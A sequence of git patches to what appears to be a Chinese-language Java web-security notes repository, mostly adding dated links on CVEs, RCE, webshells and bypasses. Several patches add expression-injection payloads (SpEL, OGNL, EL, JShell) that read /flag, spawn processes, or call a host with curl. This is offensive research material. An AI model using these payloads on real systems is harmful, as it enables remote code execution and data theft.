Date: Thu, 27 Oct 2022 20:42:56 +0800
Subject: [PATCH 095/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index ff2b853..706832e 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -187,3 +187,4 @@
+ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用**
+ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh)
+ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html)
++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ)
From df7e01ec98e9fc65c8a1461a39acc71188918cac Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 29 Oct 2022 01:33:25 +0800
Subject: [PATCH 096/257] Create Readme.md
---
wso2/Readme.md | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 wso2/Readme.md
diff --git a/wso2/Readme.md b/wso2/Readme.md
new file mode 100644
index 0000000..1e02983
--- /dev/null
+++ b/wso2/Readme.md
@@ -0,0 +1,25 @@
+# wso2
+
+## CVE-2022-29464
+
+### 文件上传
+
+路径匹配处理类
+
+
+
+
+
+### fix
+
+1.加了权限认证
+
+2.对上传文件的路径做校验
+
+### 参考
+
+https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb
+
+https://docs.wso2.com/m/mobile.action#page/180952746
+
+https://www.anquanke.com/post/id/273528?from=timeline
From eb4ece311d40e5e7ee61cdeec8a51fba4d0aca5d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 29 Oct 2022 11:14:30 +0800
Subject: [PATCH 097/257] Update Readme.md
---
shell/SPEL/Readme.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md
index b0acffd..9487637 100644
--- a/shell/SPEL/Readme.md
+++ b/shell/SPEL/Readme.md
@@ -110,6 +110,11 @@ print(')}')
其他bypass: https://xz.aliyun.com/t/9245
+## springboot回显
+```
+Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false)));
+```
+
## 参考
> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose**
>
From 914df006509b353eae398034ef49839d3df8a4f0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 29 Oct 2022 11:34:43 +0800
Subject: [PATCH 098/257] Update Readme.md
---
shell/OGNL/Readme.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md
index 1c52c1b..b09dfcf 100644
--- a/shell/OGNL/Readme.md
+++ b/shell/OGNL/Readme.md
@@ -1,5 +1,7 @@
# OGNL bypass
```java
+${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")}
+
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)
new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B");
From bca87f5ed1a77de4ffb0b4474be893d412485607 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 29 Oct 2022 11:36:21 +0800
Subject: [PATCH 099/257] Update Readme.md
---
shell/SPEL/Readme.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md
index 9487637..82b8808 100644
--- a/shell/SPEL/Readme.md
+++ b/shell/SPEL/Readme.md
@@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create("
Nuxeo RCE
''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898')
-
+
+jdk9+
+
+T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx');
```
字符串绕过
From 8ec5138ab18ade5003102b0fadc937aaf8ad021a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 30 Oct 2022 21:57:11 +0800
Subject: [PATCH 100/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 706832e..b25c00c 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -188,3 +188,4 @@
+ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh)
+ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html)
+ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ)
++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/)
From ef725d97fcc82ec08ec65de66b2eb8460ca49c47 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 1 Nov 2022 20:46:54 +0800
Subject: [PATCH 101/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b25c00c..7ce9d99 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -189,3 +189,4 @@
+ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html)
+ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ)
+ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/)
++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html)
From 6443c0b76762056b6cf3892ebe727fd9aafd25b0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 2 Nov 2022 17:43:12 +0800
Subject: [PATCH 102/257] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index afcf094..e2e39f6 100644
--- a/README.md
+++ b/README.md
@@ -23,7 +23,7 @@
+ 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚
+ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚
+ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚
-+ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚
++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚
From ed0de079fba2b2ebbd62fcd7b614fed062fc40d1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 3 Nov 2022 17:18:16 +0800
Subject: [PATCH 103/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 7ce9d99..fbe1161 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -190,3 +190,4 @@
+ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ)
+ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/)
+ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html)
++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ)
From e686af6a063a976db62edd139ee49895e4458fc1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 6 Nov 2022 19:08:20 +0800
Subject: [PATCH 104/257] Update Readme.md
---
"java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
index 63f06c2..34fce36 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
@@ -28,3 +28,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了
+ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习**
+ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数**
+ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据**
++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘**
From dfcc57324dd22bee09bdfa5b42232ea4e5b40f69 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 6 Nov 2022 20:53:37 +0800
Subject: [PATCH 105/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index fbe1161..a138ee1 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -191,3 +191,4 @@
+ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/)
+ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html)
+ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ)
++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊
From 05dd9a6d4812c96a7f2a0a5efc813d4d2ecd1927 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 6 Nov 2022 21:29:45 +0800
Subject: [PATCH 106/257] Update Readme.md
---
shell/EL/Readme.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md
index 66df221..dfd1a79 100644
--- a/shell/EL/Readme.md
+++ b/shell/EL/Readme.md
@@ -45,3 +45,5 @@ https://forum.butian.net/share/1880
```java
${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)}
```
+
+https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html
From 5b42040b3cdf4f8167f5a54026170aa85b8a4589 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 6 Nov 2022 21:31:46 +0800
Subject: [PATCH 107/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a138ee1..54be93c 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -192,3 +192,4 @@
+ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html)
+ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ)
+ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊
++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np**
From 05d5ae707ee8744edd830bafc3ee2e7f10cdfb31 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 8 Nov 2022 00:15:20 +0800
Subject: [PATCH 108/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 54be93c..857b71e 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -193,3 +193,4 @@
+ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ)
+ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊
+ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np**
++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw)
From cfff1e6afcf4ff447b456036ca4a445b6459b0a7 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 9 Nov 2022 13:08:37 +0800
Subject: [PATCH 109/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 857b71e..cb6d354 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -194,3 +194,4 @@
+ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊
+ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np**
+ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw)
++ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件**
From 98b3345681289c1b407d99630769741bc5b12221 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 9 Nov 2022 13:18:21 +0800
Subject: [PATCH 110/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index cb6d354..a119bff 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -195,3 +195,4 @@
+ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np**
+ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw)
+ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件**
++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
From fafb5256e118e107cd4bce89a584e531465fb42a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 10 Nov 2022 16:15:53 +0800
Subject: [PATCH 111/257] Create CVE-2021-33037.md
---
tomcat/Smuggling/CVE-2021-33037.md | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 tomcat/Smuggling/CVE-2021-33037.md
diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md
new file mode 100644
index 0000000..7905c08
--- /dev/null
+++ b/tomcat/Smuggling/CVE-2021-33037.md
@@ -0,0 +1,4 @@
+Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析
+
+
+[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866)
From 4c3c193f5a638d7a02dfbddc24cd0a7ea74a3cd7 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 10 Nov 2022 21:43:42 +0800
Subject: [PATCH 112/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a119bff..6f37201 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -196,3 +196,4 @@
+ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw)
+ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件**
+ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true**
From 55c1eb7eb95ba9523c46bef809589a2fa0deffcb Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 10 Nov 2022 21:47:47 +0800
Subject: [PATCH 113/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 6f37201..f24bd56 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -196,4 +196,4 @@
+ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw)
+ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件**
+ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
-+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true**
++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查**
From 07720c45c22bba5002bf9d3a7623725d59d8ef80 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 11 Nov 2022 11:37:18 +0800
Subject: [PATCH 114/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index f24bd56..59bfd5f 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -197,3 +197,4 @@
+ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件**
+ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查**
++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw)
From 66cf07e40861319e9496f869f5f0bc076b502ca9 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 11 Nov 2022 21:25:47 +0800
Subject: [PATCH 115/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 59bfd5f..3622e3f 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -198,3 +198,4 @@
+ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查**
+ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw)
++ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np**
From bcf52de768f34a5ec4346883ab62bf23d041ffb3 Mon Sep 17 00:00:00 2001
